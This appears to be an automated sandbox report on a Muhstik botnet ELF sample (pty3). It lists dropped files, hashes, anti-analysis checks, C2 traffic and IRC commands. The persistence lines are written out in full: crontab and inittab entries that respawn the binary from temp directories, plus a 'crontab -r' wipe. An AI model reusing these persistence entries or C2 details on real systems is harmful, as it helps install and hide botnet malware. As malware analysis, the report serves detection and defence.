+.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

/etc/inittab Download File
Process:	/usr/bin/cat
File Type:	ASCII text
Category:	dropped
Size (bytes):	142
Entropy (8bit):	4.326664977926882
Encrypted:	false
SSDEEP:	3:IQfXzstFXzsm3V9vtXzsqsRFXzsqjKYAXzsqG:IQo37uTR
MD5:	5FF9D0108FCFD3FE6D507A5C71471FF7
SHA1:	DC713D40F4F57F8C428C4E69D8773CE4BAA39299
SHA-256:	BF7A744DCB866FE6C59F07C77D2B579C84B057F79321028B6B45320E4F6A2EED
SHA-512:	FFCA8F8BAC306F7910A8D62AB68083AE78206BDBB7EFCD4AAEB5BBF7A0BB56841FA70E359DAF3954912C649779E409284C40E5AD3C7E562FE04C359C038BB834
Malicious:	true
Reputation:	low
Preview:	0:2345:respawn:/tmp/pty3.0:2345:respawn:/dev/shm/pty3.0:2345:respawn:/var/tmp/pty3.0:2345:respawn:/var/lock/pty3.0:2345:respawn:/var/run/pty3.

/etc/inittab2 Download File
Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.090234012145145
Encrypted:	false
SSDEEP:	3:IQfXzsqG:IQK
MD5:	56FB9AFECF429F855832A7B43D82F4A4
SHA1:	9C516C4B773BC052FA25BD26AAFB34232BEFF257
SHA-256:	2DF88CC9DB68E3E385BC0790FDAC424B8C0E81BED9E562FD82CCBF7C84680E78
SHA-512:	A5F505C6E94F158859D8559D2BEEB4DA1106B3F6260E2B2ABD16630BBB6A218CE2E832EFB69F8C45F0B8413BF2BF645BC64D855738E0D2C63F5A034873363DB5
Malicious:	false
Reputation:	low
Preview:	0:2345:respawn:/var/run/pty3.

/run/lock/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48980
Entropy (8bit):	7.873177412760172
Encrypted:	false
SSDEEP:	768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
MD5:	FDD5532C5EC4D3238D2FD36B0A0B187F
SHA1:	0E281FA38DCD1C3DB0F9059991A351AD4D67238D
SHA-256:	C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
SHA-512:	27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 43%, Browse Antivirus: ReversingLabs, Detection: 51%
Reputation:	low
Preview:	.ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

/run/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48980
Entropy (8bit):	7.873177412760172
Encrypted:	false
SSDEEP:	768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
MD5:	FDD5532C5EC4D3238D2FD36B0A0B187F
SHA1:	0E281FA38DCD1C3DB0F9059991A351AD4D67238D
SHA-256:	C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
SHA-512:	27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Reputation:	low
Preview:	.ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

/var/spool/cron/crontabs/tmp.001wAF Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.072929187836181
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLqUdvGMQ5UYLtCFt39YBtGFz:8QjHig8RDeHLU9Yfa
MD5:	B2120EC0BD1178FF7A70EF4783357B0C
SHA1:	1E4BBE488005CD40ADF64E53FC7C9AF45595AC6D
SHA-256:	3A465EEE011CDB88AD58DA7D79F3256F5516494BCDB9C966BA51A974D958312E
SHA-512:	4FC375AEFECA7CB516CCCEEB777883776D40BA96BC0A9BF46C57FB7BC7C6B33AE96B19D7C915C77846BD8B061707099D21D0A333F4038D27F796EFDFC3AE8AE8
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:20 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.2HVWUA Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	344
Entropy (8bit):	4.9133944051734595
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLqUkvGMQ5UYLtCFt39YBtGF5qzK37hGF5qIajbGF5f:8QjHig8qeHLU9YfsqzKdsq1bsq0Ya
MD5:	AF1974E24213CF6B57893F593BCE9986
SHA1:	78241B0D72E9E35325190F26FF6CFBF2FA82CE2E
SHA-256:	B44CAE719F583E05DCDF6C66AA744E6F1D885FE317AEC4324F00D19111BF44BE
SHA-512:	33475AADB54FDDF85A225581EBE48E6C6D7698EC2D20F15987181DA9E408A31868A953C28131B53A5A8479FEC223EE2F2F39B36A8DFC6FDD367413BC61702789
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:23 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.* * * * * /var/lock/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.7EMzq6 Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	4.959035701492149
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLqUfttGMQ5UYLtCFt39YBtGF5qzK37hGF5qIajbGFz:8QjHig8PeHLU9YfsqzKdsq1ba
MD5:	E10775D9C7495A56D985BA6D24F04971
SHA1:	F2AF6D078A22A54D218125378405153F13F35244
SHA-256:	41192B41826BDFE662B33F87608BD8CD0D465F47980CB250ECFB4CA9828ADF1E
SHA-512:	0F5F5EA86E2DB57511CEC9C972361B54334B84D5625464ED33AC41C4CF837AAF89B0E43EAB476FEB7ED81F4C0AB047F3AE7490819F3ABEA62C266701FDB7DF82
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:22 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.ASDRld Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	387
Entropy (8bit):	4.860926909779814
Encrypted:	false
SSDEEP:	12:8QjHig8VDeHLU9YfsqzKdsq1bsq0Ysqha:8+mDALUqkqLqSqeq4
MD5:	B8695D1996AC130769ABCB0BE9B83CE6
SHA1:	4D6DA9159B3CF32289049D8F89CACA60B41946CF
SHA-256:	E3D4D7BCF71DC0721B0BD9D8539EFA0A1DF8FE88106805E3CC2FBFADB1673C0E
SHA-512:	842696DAD0EB0F9CBB1827AB8511471B1C3BB9F92DF273D7E82FBAFE098FACDD10AE3AF40D6922BD79C430969857B8A7EFE53EF86203C93D2BF73AF6C654E523
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:24 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.* * * * * /var/lock/pty3 > /dev/null 2>&1 &.* * * * * /var/run/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.FFzEXt Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	257
Entropy (8bit):	5.022659358967117
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLqUfttGMQ5UYLtCFt39YBtGF5qzK37hGFz:8QjHig8PeHLU9YfsqzKda
MD5:	C71599D8680967BEB704A5F31B72354B
SHA1:	C98DBA8217CD8EA9D51DDE2E54DC64116B4B8386
SHA-256:	4A2AE607AB7E3A3C691C696E8E885FC48BE0CB69E8F7C3FE5CEED755DF996DA6
SHA-512:	FCF3E123F8DC13A8865A9ACBB23ED338CEEB48BDEBB4797713A056CC0B42D2262142A3E5D975D3F1CB8A878F9D0C699769458C57B985D02CF453CC66447EC1BD
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:22 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.

/var/tmp/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48980
Entropy (8bit):	7.873177412760172
Encrypted:	false
SSDEEP:	768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
MD5:	FDD5532C5EC4D3238D2FD36B0A0B187F
SHA1:	0E281FA38DCD1C3DB0F9059991A351AD4D67238D
SHA-256:	C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
SHA-512:	27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Reputation:	low
Preview:	.ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

Static File Info

General
File type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Entropy (8bit):	7.873177412760172
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	pty3
File size:	48980
MD5:	fdd5532c5ec4d3238d2fd36b0a0b187f
SHA1:	0e281fa38dcd1c3db0f9059991a351ad4d67238d
SHA256:	c01fa3e23232da79e1ee1e722050ab8ac09b90bfebbf93a440bc1316ef7a127c
SHA512:	27df31ae49131ba273a06511ee9b5975e81679ddb6bbe4f697f8e83dc3a5dd11ba2dd5e4c4f58ca32a2ed5a38ce547d625b80b9d5cca1d494292058f411d330e
SSDEEP:	768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
File Content Preview:	.ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - Linux
ABI Version:	0
Entry Point Address:	0x10b690
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	64
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x100000	0x100000	0xbdf4	0xbdf4	4.3701	0x5	R E	0x100000
LOAD	0x1ad50	0x51ad50	0x51ad50	0x0	0x0	0.0000	0x6	RW	0x100000

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/23/21-11:31:26.324961	TCP	2034743	ET TROJAN ELF/Muhstik Botnet CnC Activity	48714	8080	192.168.2.23	156.67.220.165

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2021 11:31:19.390398979 CET	42836	443	192.168.2.23	91.189.91.43
Dec 23, 2021 11:31:19.902496099 CET	42516	80	192.168.2.23	109.202.202.202
Dec 23, 2021 11:31:22.846735001 CET	57024	8080	192.168.2.23	45.132.241.68
Dec 23, 2021 11:31:23.004362106 CET	8080	57024	45.132.241.68	192.168.2.23
Dec 23, 2021 11:31:24.310235023 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:24.586339951 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:24.590825081 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:25.310271025 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:25.586566925 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:25.586900949 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:26.324960947 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:26.601186037 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:26.601528883 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:26.601964951 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:26.620393038 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:26.897075891 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:26.897470951 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:26.899209976 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:27.215109110 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:27.215404034 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:27.491563082 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:27.491609097 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:31:27.491894960 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:31:33.726334095 CET	43928	443	192.168.2.23	91.189.91.42
Dec 23, 2021 11:31:46.014168978 CET	42836	443	192.168.2.23	91.189.91.43
Dec 23, 2021 11:31:50.110038996 CET	42516	80	192.168.2.23	109.202.202.202
Dec 23, 2021 11:32:14.685667038 CET	43928	443	192.168.2.23	91.189.91.42

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2021 11:31:21.532661915 CET	43529	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:21.713069916 CET	53	43529	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:21.713284016 CET	43529	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:21.729979992 CET	53	43529	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:21.744107008 CET	53300	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:21.786370039 CET	53	53300	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:21.786593914 CET	53300	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:21.802721024 CET	53	53300	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:22.166868925 CET	35209	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:22.208149910 CET	53	35209	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:22.208921909 CET	35209	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:22.225281000 CET	53	35209	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:22.402837038 CET	47074	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:22.782742977 CET	53	47074	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:22.783082962 CET	47074	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:22.799360037 CET	53	47074	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:22.812175035 CET	36639	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:22.829125881 CET	53	36639	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:22.829816103 CET	36639	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:22.846288919 CET	53	36639	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:24.109206915 CET	39073	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:24.140013933 CET	53	39073	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:24.140464067 CET	39073	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:24.157177925 CET	53	39073	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:24.276345015 CET	42038	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:24.293042898 CET	53	42038	1.1.1.1	192.168.2.23
Dec 23, 2021 11:31:24.293488979 CET	42038	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:31:24.309743881 CET	53	42038	1.1.1.1	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 23, 2021 11:31:21.532661915 CET	192.168.2.23	1.1.1.1	0x9bf2	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:21.713284016 CET	192.168.2.23	1.1.1.1	0x9bf2	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:21.744107008 CET	192.168.2.23	1.1.1.1	0x32e8	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:21.786593914 CET	192.168.2.23	1.1.1.1	0x32e8	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.166868925 CET	192.168.2.23	1.1.1.1	0xca9e	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.208921909 CET	192.168.2.23	1.1.1.1	0xca9e	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.402837038 CET	192.168.2.23	1.1.1.1	0x4095	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.783082962 CET	192.168.2.23	1.1.1.1	0x4095	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.812175035 CET	192.168.2.23	1.1.1.1	0x8623	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.829816103 CET	192.168.2.23	1.1.1.1	0x8623	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.109206915 CET	192.168.2.23	1.1.1.1	0xfca3	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.140464067 CET	192.168.2.23	1.1.1.1	0xfca3	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.276345015 CET	192.168.2.23	1.1.1.1	0xf3f0	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.293488979 CET	192.168.2.23	1.1.1.1	0xf3f0	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 23, 2021 11:31:21.713069916 CET	1.1.1.1	192.168.2.23	0x9bf2	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:21.729979992 CET	1.1.1.1	192.168.2.23	0x9bf2	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:21.786370039 CET	1.1.1.1	192.168.2.23	0x32e8	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:21.802721024 CET	1.1.1.1	192.168.2.23	0x32e8	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.208149910 CET	1.1.1.1	192.168.2.23	0xca9e	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.225281000 CET	1.1.1.1	192.168.2.23	0xca9e	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.782742977 CET	1.1.1.1	192.168.2.23	0x4095	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.799360037 CET	1.1.1.1	192.168.2.23	0x4095	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.829125881 CET	1.1.1.1	192.168.2.23	0x8623	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:22.846288919 CET	1.1.1.1	192.168.2.23	0x8623	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.140013933 CET	1.1.1.1	192.168.2.23	0xfca3	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.157177925 CET	1.1.1.1	192.168.2.23	0xfca3	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.293042898 CET	1.1.1.1	192.168.2.23	0xf3f0	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:31:24.309743881 CET	1.1.1.1	192.168.2.23	0xf3f0	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)

IRC Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 23, 2021 11:31:26.324960947 CET	48714	8080	192.168.2.23	156.67.220.165	NICK x86\|LOG\|i\|0\|10263889\|galassia USER x01 localhost localhost :muhstik-11052018
Dec 23, 2021 11:31:27.215404034 CET	48714	8080	192.168.2.23	156.67.220.165	JOIN #log :8974 WHO x86\|LOG\|i\|0\|10263889\|galassia

System Behavior

Analysis Process: pty3 PID: 5223 Parent PID: 5118

General

Start time:	11:31:15
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	/tmp/pty3
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5224 Parent PID: 5223

General

Start time:	11:31:15
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5224 Parent PID: 5223

General

Start time:	11:31:15
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "pidof -x strace > /dev/null"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5225 Parent PID: 5224

General

Start time:	11:31:15
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pidof PID: 5225 Parent PID: 5224

General

Start time:	11:31:15
Start date:	23/12/2021
Path:	/usr/bin/pidof
Arguments:	pidof -x strace
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

Chronological Activities

Analysis Process: pty3 PID: 5226 Parent PID: 5223

General

Start time:	11:31:17
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5226 Parent PID: 5223

General

Start time:	11:31:17
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "pidof -x tcpdump > /dev/null"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5227 Parent PID: 5226

General

Start time:	11:31:17
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pidof PID: 5227 Parent PID: 5226

General

Start time:	11:31:17
Start date:	23/12/2021
Path:	/usr/bin/pidof
Arguments:	pidof -x tcpdump
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

Chronological Activities

Analysis Process: pty3 PID: 5230 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5232 Parent PID: 5230

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5232 Parent PID: 5230

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -r"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5235 Parent PID: 5232

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
